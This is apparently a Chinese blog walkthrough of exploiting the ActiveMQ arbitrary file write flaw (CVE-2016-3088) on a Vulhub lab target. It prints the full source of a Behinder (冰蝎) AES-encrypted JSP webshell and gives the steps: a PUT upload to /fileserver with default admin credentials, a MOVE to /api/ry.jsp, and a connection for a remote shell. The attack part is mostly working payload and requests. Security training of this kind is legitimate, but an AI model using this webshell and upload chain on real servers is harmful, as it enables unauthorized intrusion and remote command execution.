Vulhub靶机 ActiveMQ任意 文件写入(CVE-2016-3088)(渗透测试详解)

一、开启vulhub环境

复制代码
docker-compose up -d  启动
docker ps 查看开放的端口

漏洞版本:ActiveMQ在5.14.0之前的版本(不包括5.14.0)

二、访问靶机IP 8161端口

默认账户密码都是admin

1、利用bp抓包,修改为PUT方法并在fileserver目录上传ry.txt冰蝎马,回显204证明上传成功**(注意要加Authorization:认证参数)**

复制代码
/fileserver/ry.txt  请求目录
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>  冰蝎码

2、访问/fileserver/ry.txt文件,看是否可以成功解析

解析成功

3、通过MOVE方法移动ry.txt冰蝎马到api页面的ry.jsp文件中

复制代码
MOVE /fileserver/ry.txt  移动方法
Destination: file:///opt/activemq/webapps/api/ry.jsp  写入路径

3、访问/api/ry.jsp,看是否解析

三、冰蝎连接,得到一个shell

注,需要在自定义请求头加上认证参数,如下:``Authorization: Basic YWRtaW46YWRtaW4=

至此,命令执行成功。

下期再见,家人们。

相关推荐
zskj_zhyl17 分钟前
AI健康小屋“15分钟服务圈”:如何重构社区健康生态?
大数据·人工智能·物联网
武汉唯众智创18 分钟前
高职院校“赛岗课”一体化网络安全实战类人才培养方案
网络·安全·web安全·网络安全·“赛岗课”一体化·赛岗课
AllData公司负责人32 分钟前
实时开发IDE部署指南
大数据·ide·开源
2501_915918411 小时前
iPhone 抓包工具有哪些?多工具对比分析优缺点
websocket·网络协议·tcp/ip·http·网络安全·https·udp
电商数据girl1 小时前
有哪些常用的自动化工具可以帮助处理电商API接口返回的异常数据?【知识分享】
大数据·分布式·爬虫·python·系统架构
ZeroNews内网穿透2 小时前
服装零售企业跨区域运营难题破解方案
java·大数据·运维·服务器·数据库·tcp/ip·零售
百胜软件@百胜软件2 小时前
重庆兰瓶×百胜软件正式签约,全渠道中台赋能美业新零售
大数据·零售
江瀚视野2 小时前
美团即时零售日订单突破1.2亿,即时零售生态已成了?
大数据·人工智能·零售
时序数据说2 小时前
IoTDB:专为物联网场景设计的高性能时序数据库
大数据·数据库·物联网·开源·时序数据库·iotdb
厚道2 小时前
ES查询性能优化
elasticsearch